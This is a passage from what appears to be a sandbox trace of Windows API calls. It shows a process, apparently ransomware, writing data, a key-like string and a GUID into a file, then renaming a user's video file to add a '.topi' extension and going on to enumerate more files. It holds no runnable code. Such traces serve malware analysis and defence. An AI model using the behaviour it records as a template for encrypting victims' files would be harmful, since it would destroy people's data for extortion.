dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50c0 [0098.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5108 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50d8 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50d8 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0098.017] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50d8 | out: hHeap=0x680000) returned 1 [0098.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.018] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5108 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50f0 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50c0 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50a8 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbd10 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.018] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.019] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x13828, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x13828, lpOverlapped=0x0) returned 1 [0098.019] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0098.019] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1382d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.019] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0098.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.020] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.020] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.020] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.020] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.020] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0098.020] CloseHandle (hObject=0x6a8) returned 1 [0098.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ed08 [0098.027] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0098.027] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ed08 | out: hHeap=0x680000) returned 1 [0098.027] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\Kl1nm7nD8LS\\G7Te.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\kl1nm7nd8ls\\g7te.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\Kl1nm7nD8LS\\G7Te.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\kl1nm7nd8ls\\g7te.mp4.topi")) returned 1 [0098.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.028] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.028] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.029] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54400f70, ftCreationTime.dwHighDateTime=0x1d5bd52, ftLastAccessTime.dwLowDateTime=0x8a2e2e30, ftLastAccessTime.dwHighDateTime=0x1d5b967, ftLastWriteTime.dwLowDateTime=0x8a2e2e30, ftLastWriteTime.dwHighDateTime=0x1d5b967, nFileSizeHigh=0x0, nFileSizeLow=0x1382d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G7Te.mp4", cAlternateFileName="")) returned 0 [0098.029] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0098.029] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317edb0 | out: hHeap=0x680000) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df5e0 | out: hHeap=0x680000) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4420 | out: hHeap=0x680000) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4550 | out: hHeap=0x680000) returned 1 [0098.029] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df668 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ea28 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317efa8 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f050 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4718 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df558 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ec60 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f0f8 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eb98 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ee58 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4718 [0098.030] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0098.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.033] HeapFree (in: hHeap=0x680000, 